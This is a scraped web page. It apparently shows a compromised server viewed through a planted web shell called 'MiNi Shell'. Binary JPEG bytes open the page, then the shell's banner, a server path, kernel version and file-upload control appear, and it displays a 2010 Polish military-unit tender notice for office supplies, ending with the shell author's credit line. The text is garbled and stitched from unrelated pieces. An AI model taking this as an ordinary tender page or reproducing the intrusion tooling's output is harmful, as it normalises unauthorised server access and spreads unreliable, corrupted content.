JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/37129-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów i urządzeń biurowych dla Jednostki Wojskowej 2414

Sprawa Nr 08/2010/PN/JW2414</b><br>
<b>Numer ogłoszenia: 37129 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2414 , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 022 6847323, 022 6848574, faks 022 6847323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jw2414.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów i urządzeń biurowych dla Jednostki Wojskowej 2414

Sprawa Nr 08/2010/PN/JW2414.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Segregator A4 75 kolor zielony		szt.	65				
2	Segregator A4 75 kolor  niebieski		szt.	40				
3	Segregator A4 75 kolor czarny		szt.	40				
4	Długopis typu PENTEL BK-437		szt.	300				
5	Wkład do długopisu zaproponowanego w poz. 4		szt.	1 000				
6	Ołówek techniczny typu OTHELLO z gumką		szt.	400				
7	Temperówka		szt.	701				
8	Zeszyt A-4 96K		szt.	70				
9	Zakreślacze 4 kolory		kpl.	80				
10	Nożyczki biurowe		szt.	15				
11	Kostka samoprzylepna typu CONTACTA		szt.	150				
12	Klej w sztyfcie 36g		szt.	400				
13	Cienkopis typu 89 EDDING		szt.	200				
14	Folia do laminacji typu ARGO A4		op.	20				
15	Folia do laminacji matowa typu ARGO A4:		op.	20				
16	Teczka z gumką A4		szt.	200				
17	Teczki A-4 z rączką		szt.	40				
18	Teczka na dokumenty A-4 zamykana na rzepy		szt.	60				
19	Długopis żelowy typu K 116 PENTEL		szt.	90				
20	Wkład do długopisu żelowego 
zaproponowanego w poz. 19		szt.	350				
21	Zszywacz typu Heavy Duty Eagle 8539		szt.	1				
22	Zszywki 23 6 opakowanie po 1000 szt.		op.	3				
23.	Zszywki  23 8 opakowanie po 1000 szt.		op.	3				
24.	Zszywki 23 10 opakowanie po 1000 szt.		op.	3				
25.	Zszywki  23 13 opakowanie po 1000 szt.		op.	3				
26.	Zszywki  23 15 opakowanie po 1000 szt.		op.	3				
27.	Zszywki 23 17 opakowanie po 1000 szt.		op.	3				
28.	Zszywki  23 20 opakowanie po 1000 szt.		op.	3				
29.	Zszywki 23 23 opakowanie po 1000 szt.		op.	3				
30.	Ołówek automatyczny		szt.	60				
24	Rysiki do ołówków 0,5		op.	50				
25	Grzbiety plastikowe 28 mm do bindownic		op.	10				
27	Folia samoprzylepna formatu A4		op.	3				
28	Wymienne ostrza do noża typu BANTEX		szt.	10				
29	Taśma z podajnikiem typu ESSELTE		szt.	450				
30	Teczka A-4 z klipem		szt.	71				
31	Datownik typu COLOP		szt.	10				
32	Numerator samotuszujący 4846 typu TRODAT, 
seria PRINTY		szt.	5				
33	Teczka skrzydłowa formatu A4 		szt.	80				
34	Pudełko archiwizacyjne typu IDEST		szt.	500				
35	Okładka kanałowa miękka		szt.	290				
36	Pióro typu Parker Sonet 		szt.	2				
37	Papier ksero A-4 typu POLJET - PRESTIŻ		ryza	390				
38	Papier STANDARD do drukarki ploter 		rol.	4				
39	Karton wizytówkowy A4		op.	80				
40	Papier kolorowy do kserokopiarek i drukarek		op.	100				
41	Arkusz barwny A4 100g m2		op.	5				
42	Papier fotograficzny typu Esselte 177g m2		op.	5				
43	Papier typu HP Laser Photo
błyszczący gramatura 160g m2.		op.	2				
44	Papier typu HP Laser Photo
matowy gramatura 160g m2.		op.	2				
45	Papier typu HP Laser Photo
matowy gramatura 220g m2.		op.	2				
46	Papier typu HP Laser Photo
błyszczący gramatura 220g m2.		op.	2				
47	Papier A2 gramatura 102gm2,		ryza	15				
48	Segregatory A5 kolorowe		szt. 	20				
49	Koszulki A5: do segregatora, przeźroczyste		op. 	5				
50	Koszulki A4: do segregatora, przeźroczyste		op. 	10				
oraz

1	Taśma w kasecie do drukarki BROTHER 
12 mm, biała, samoprzylepna TZ 231		szt.	20				
2.	Papier biurowy do drukarek i kopiarek gramatura 80g m2		ryza	116				
3.	Papier biurowy do drukarek i kopiarek gramatura 90g m2		ryza	50				
4,	Długopis typu Pentel BKN 77 czarny	szt.	100				
5.	Długopis typu Pentel BKN 77 niebieski		szt.	100				
6.	Wkład niebieski - 50 szt., czarny - 100 szt.
do długopisu zaproponowanego w poz. 5		szt.	150				
7.	Pióro kulkowe typu Pentel niebieskie		szt.	15				
8.	Wkład do pióra kulkowego niebieski zaproponowanego w poz. 7		szt.	10				
9.	Pióro kulkowe typu Pentel czarne		szt.	15				
10.	Wkład do pióra kulkowego czarny zaproponowanego 
w poz. 9		szt.	10				
11.	Segregator A4 70		szt.	10				
12.	Teczka A4 lakierowana różne kolory		szt.	40				
13.	Teczka typu Snopake z kieszenią kolorowa		szt.	50				
14.	Skoroszyt A4 tektura		szt.	20				
15.	Zeszyt A4 80 w kratkę typu typu Unipap, Top 2 000, Nomico		szt.	10				
16.	Zeszyt B5 80 w kratkę typu Unipap, Top 2 000, Nomico		szt.	10				
17.	Zeszyt B5 160 w kratkę typu Unipap, Top 2 000, Nomico		szt.	10				
18.	Teczka na dokumenty 		szt.	40				
19.	Skoroszyt A4 		szt.	40				
20.	Koperty małe 160x15 białe		szt.	500				
21.	Ołówek automatyczny typu Tikky Rotring		szt.	10				
22.	Rysiki do ołówków 0,5 mm		op.	5				
23.	Rysiki do ołówków 0,7 mm		op.	5				
24.	Ołówki zwykłe typu Staedtler		szt.	30				
25.	Gumka kreślarska typu Staedtler		szt.	20				
26.	Spinacze biurowe		op.	40				
27.	Zszywki 24 6		op.	20				
28.	Temperówka typu Faber - Castell		szt.	4				
29.	Klej w sztyfcie typu Pritt 		szt.	10				
30.	Dziurkacz biurowy metalowy		szt.	5				
31.	Zszywacz metalowy 		szt.	10				
32.	Datownik samotuszujący 		szt.	10				
33.	Plastelina 6 kolorów		op.	15				
34.	Taśma klejąca typu Scoth		szt.	40				
35.	Bloczki samoprzylepne 		szt.	10				
36.	Kostka różnokolorowa 80x80mm		szt.	50				
37.	Kostka różnokolorowa 76x76mm		szt.	15				
38.	Obwoluta na dokumenty A4		szt.	1 000				
39.	Bezolejowy tusz do stempli czerwony		szt.	8				
40.	Naboje atramentowe do pióra Wattermen		op.	10				
41.	Zakreślacie typu Stabilo Boss		kpl.	10				
42.	Linijki typu Leniar		szt.	5				
43.	Klips do papieru 25mm 12 szt. w opakowaniu		op. 	10				
44.	Klips do papieru 30mm 12 szt. w opakowaniu		op. 	10				
45.	Cienkopisy typu Staedtler czarny		szt.	30				
46.	Cienkopisy typu Staedtler niebieski		szt.	30				
47.	Cienkopisy typu Staedtler zielony		szt.	20				
48.	Cienkopisy typu Staedtler czerwony   	szt.	30				
49.	Marker do folii typu Lumocolor Steadtler		kpl.	20				
50.	Marker pernamentny czerwony		szt.	50				
51.	Marker pernamentny czarny  		szt.	10				
52.	Marker pernamentny zielony 	             	szt.	4				
53.	Marker pernamentny niebieski		szt.	5				
54.	Rolka biała do kalkulatora SHARP EL 2195L		szt.	10				
55.	Taśma czarna do kalkulatora SHARP EL 2195L		szt.	10				
56.	Taśma czerwona do kalkulatora SHARP EL 2195L		szt.	10				
57.	Okładki do bindownic Chromolux Lami 		op.	10				
58.	Okładki kanałowe twarde do bindownicy ImpressBind		op. 	20				
59.	Listwy wsuwane standard		op.	10				
60.	Tusz szybkoschnący 50s		szt.	5				

oraz

1	Urządzenie do niszczenia akt typu FELLOWES 		szt.	9				
2	Kalkulator biurowy z wyświetlaczem
 typu CASIO		szt.	10				
3	Bindownica		szt. 	2				
4	Laminator		szt. 	2				
5	Kserokopiarka cyfrowa format A-4		szt.	2				
6	Kserokopiarka cyfrowa format A-3		szt.	1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jw2414.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 2414
00-909 WARSZAWA
ul. Żwirki i Wigury 9/13,  bud. 21, pokój 117.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2010 godzina 09:00, miejsce: JEDNOSTKA WOJSKOWA 2414
00-909 WARSZAWA
ul. Żwirki i Wigury 9/13,  bud. 2, 
kancelaria (czynna w dni robocze,
 w godz.7.30 -   9.00 ;12.00 -15.30).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych - szczegółowo określonych w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych - szczegółowo określonych w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa urządzeń biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa urządzeń  biurowych - szczegółowo określonych w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com